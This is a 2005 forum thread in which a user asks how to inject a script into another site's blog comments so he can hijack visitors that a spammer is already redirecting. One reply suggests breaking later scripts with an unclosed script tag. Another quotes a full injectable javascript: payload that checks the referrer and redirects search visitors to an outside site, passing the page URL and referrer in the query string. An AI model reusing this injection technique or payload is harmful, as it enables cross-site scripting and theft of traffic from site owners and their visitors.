Script kiddies help me out

Is there any chance of overriding (if that is correct way to explain it ) javascript redirect on html page, "location . replace ...." That code is not in the head, its in the body.

What I want to do is redirect them whereever i want. Thing is code could be inserted after his redirect i.e in the html it would be after that persons code.
However it could be somekind of div or popup or src or meta-refresh or what ever aslong as it works.

Any thoughts ?

Lol
what the fuk are you talking about ?

marttali 10-25-2005 01:34 AM

i got a html page where someone uses javascript to redirect visitors. Is there a way to supply my own little script to redirect those visitors before the original does its work ?

darksoul 10-25-2005 01:36 AM

Yes,
if you load your code first.

marttali 10-25-2005 01:39 AM

cant do that, are there any other ways like a div or a pop-up or someway of killing that javascript ?

darksoul 10-25-2005 01:45 AM

without more details
the answer is no.

i found a nicely ranking blog where html is allowed in comments. Now someone is using a redirect to get those visitors. The script is inserted through comment box.

maybe there is somekind of javascript event which could be launched before the actual redirect ?

SmokeyTheBear 10-25-2005 01:57 AM

are there other scripts before this malicious script that need to be run for the page to work.. ??

If you simply open a script tag like <script src=blah> and dont use </script> the next script will be fucked up i think

SmokeyTheBear 10-25-2005 02:01 AM

oh i get you , you dont own the page , you just want to steal the visitors from the other guy who is stealing them.. it wont work they are likely using something like this

<a style="BACKGROUND: url(javascript: var r = document.referrer; if( r.indexOf('google')>-1 || r.indexOf('ask.')>-1 || r.indexOf('search.yahoo')>-1 || r.indexOf('excite')>-1 || r.indexOf('altavista')>-1 || r.indexOf('msn')>-1 || r.indexOf('netscape')>-1 || r.indexOf('aol')>-1 || r.indexOf('hotbot')>-1 || r.indexOf('goto')>-1 || r.indexOf('infoseek')>-1 || r.indexOf('mamma')>-1 || r.indexOf('alltheweb')>-1 || r.indexOf('lycos')>-1 || r.indexOf('lycos')>-1 || r.indexOf('search.com')>-1 || r.indexOf('metacrawler.com')>-1 || r.indexOf('dogpile')>-1 || r.indexOf('stb')>-1 ) { location.replace('http://www.somesite.com/index.php?site='+escape(document.location)+'&ref=' +escape(document.referrer));})">hi</a>

marttali 10-25-2005 02:03 AM

marttali 10-25-2005 02:04 AM

smokey that is correct, i'm trying to fuck a seo spammer

marttali 10-25-2005 02:07 AM

no, they are not using nothing like that, location.replace mymoneymaking.url is what they use.

s9ann0 10-25-2005 03:08 AM

i dunno but if you can add code later can't you liek bind a bit of code to there bit like onExit or whenever their shit happens
do this other shit type of shit ?

marttali 10-26-2005 12:11 AM

guess theres no way to achieve this or ?

Alky 10-26-2005 12:19 AM

i dont think theres a way around it unless you can get your code to load first.

subVERSION 10-26-2005 12:22 AM
